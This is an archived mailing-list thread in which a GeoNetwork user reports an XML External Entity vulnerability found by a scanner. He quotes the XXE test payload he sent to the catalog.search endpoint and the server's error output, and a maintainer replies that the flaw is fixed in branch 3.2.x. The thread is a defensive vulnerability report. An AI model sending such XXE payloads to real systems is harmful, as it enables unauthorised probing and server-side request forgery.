Geonetwork XEE Vulnerability question
Locked
Geonetwork XEE Vulnerability question
 
|
Hi,
My name es Mariano Valderrey, and I have scanned my GeoNetwork with Accunetix and found XML External Entity Injection vulnerability. I found that en GeoServer you have fixed the problem and maybe I can use the solution for GeoNetwork 3.2. I wonder if you can help me with this. Here is what I found: https://www.owasp.org/index.php/XML_External_Entity_%28XXE%29_Processing ************** To confirm this I send a specific request with this XML to the URL /geonetwork/srv/eng/catalog.search <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE request [ <!ENTITY include SYSTEM "http://google.com"> ]> <catalog.search>&include;</catalog.search> And I received this result: <html> <head> <meta http-equiv="Content-Type" content="text/html;charset=utf-8"/> <title>Error 400 Cannot build ServiceRequest Cause : Error on line 1 of document http://www.google.com.ar/?gfe_rd=cr&ei=_x9cWI-FMsWB8QfG05vIDA: The content of elements must consist of well-formed character data or markup. Error : org.jdom.input.JDOMParseException </title> </head> <body><h2>HTTP ERROR 400</h2> <p>Problem accessing /geonetwork/srv/eng/catalog.search. Reason: <pre> Cannot build ServiceRequest Cause : Error on line 1 of document http://www.google.com.ar/?gfe_rd=cr&ei=_x9cWI-FMsWB8QfG05vIDA: The content of elements must consist of well-formed character data or markup. Error : org.jdom.input.JDOMParseException </pre></p><hr><a href="http://eclipse.org/jetty">Powered by Jetty:// 9.3.11.v20160721</a><hr/> </body> </html> ****************** The package capture from the server I can see that send a request to http://google.com and I found in the result that the server was redirected to www.google.com.ar. This confirm the vulnerability. Sorry for my english, Greetings and thank you so much. -- Ing. en Sistemas Mariano Valderrey Tel. (+54 11) 4331 0074 int. 5727 Unidad Base de Datos y Comunicaciones Gerencia de Gestión Tecnológica CONAE ------------------------------------------------------------------------------ Check out the vibrant tech community on one of the world's most engaging tech sites, SlashDot.org! http://sdm.link/slashdot _______________________________________________ GeoNetwork-usuarios-es mailing list [hidden email] https://lists.sourceforge.net/lists/listinfo/geonetwork-usuarios-es |
Re: Geonetwork XEE Vulnerability question
|
|
Hola Mariano
Este issue está resuelto en el branch 3.2.x: https://github.com/geonetwork/core-geonetwork/commit/8bb55373d0c79fd17bfa40e725cf255c9a019145 y lo incorporará la versión 3.2.1 Saludos, Jose García On Wed, Dec 28, 2016 at 6:30 PM, Mariano Valderrey <[hidden email]> wrote: > Hi, > > My name es Mariano Valderrey, and I have scanned my GeoNetwork with > Accunetix and found XML External Entity Injection vulnerability. I > found that en GeoServer you have fixed the problem and maybe I can use > the solution for GeoNetwork 3.2. > I wonder if you can help me with this. > > Here is what I found: > > https://www.owasp.org/index.php/XML_External_Entity_%28XXE%29_Processing > > ************** > > To confirm this I send a specific request with this XML to the URL > /geonetwork/srv/eng/catalog.search > > <?xml version="1.0" encoding="utf-8"?> > <!DOCTYPE request [ > <!ENTITY include SYSTEM "http://google.com"> > ]> > <catalog.search>&include;</catalog.search> > > And I received this result: > > <html> > <head> > <meta http-equiv="Content-Type" content="text/html;charset=utf-8"/> > <title>Error 400 Cannot build ServiceRequest > Cause : Error on line 1 of document > http://www.google.com.ar/?gfe_rd=cr&ei=_x9cWI-FMsWB8QfG05vIDA: The > content of elements must consist of well-formed character data or markup. > Error : org.jdom.input.JDOMParseException > </title> > </head> > <body><h2>HTTP ERROR 400</h2> > <p>Problem accessing /geonetwork/srv/eng/catalog.search. Reason: > <pre> Cannot build ServiceRequest > Cause : Error on line 1 of document > http://www.google.com.ar/?gfe_rd=cr&ei=_x9cWI-FMsWB8QfG05vIDA: The > content of elements must consist of well-formed character data or markup. > Error : org.jdom.input.JDOMParseException > </pre></p><hr><a href="http://eclipse.org/jetty">Powered by Jetty:// > 9.3.11.v20160721</a><hr/> > > </body> > </html> > > ****************** > > The package capture from the server I can see that send a request to > http://google.com and I found in the result that the server was > redirected to www.google.com.ar. This confirm the vulnerability. > > Sorry for my english, > > Greetings and thank you so much. > > > -- > Ing. en Sistemas Mariano Valderrey > Tel. (+54 11) 4331 0074 int. 5727 > Unidad Base de Datos y Comunicaciones > Gerencia de Gestión Tecnológica > CONAE > > ------------------------------------------------------------ > ------------------ > Check out the vibrant tech community on one of the world's most > engaging tech sites, SlashDot.org! http://sdm.link/slashdot > _______________________________________________ > GeoNetwork-usuarios-es mailing list > [hidden email] > https://lists.sourceforge.net/lists/listinfo/geonetwork-usuarios-es > -- *Vriendelijke groeten / Kind regards,Jose García <http://www.geocat.net/>Veenderweg 136721 WD BennekomThe NetherlandsT: +31 (0)318 416664 <+31318416664> <https://www.facebook.com/geocatbv> <https://twitter.com/geocat_bv> <https://plus.google.com/u/1/+GeocatNetbv/posts>Please consider the environment before printing this email.* ------------------------------------------------------------------------------ Check out the vibrant tech community on one of the world's most engaging tech sites, SlashDot.org! http://sdm.link/slashdot _______________________________________________ GeoNetwork-usuarios-es mailing list [hidden email] https://lists.sourceforge.net/lists/listinfo/geonetwork-usuarios-es |
«
Return to GeoNetwork users español
|
1 view|%1 views
| Free forum by Nabble | Edit this page |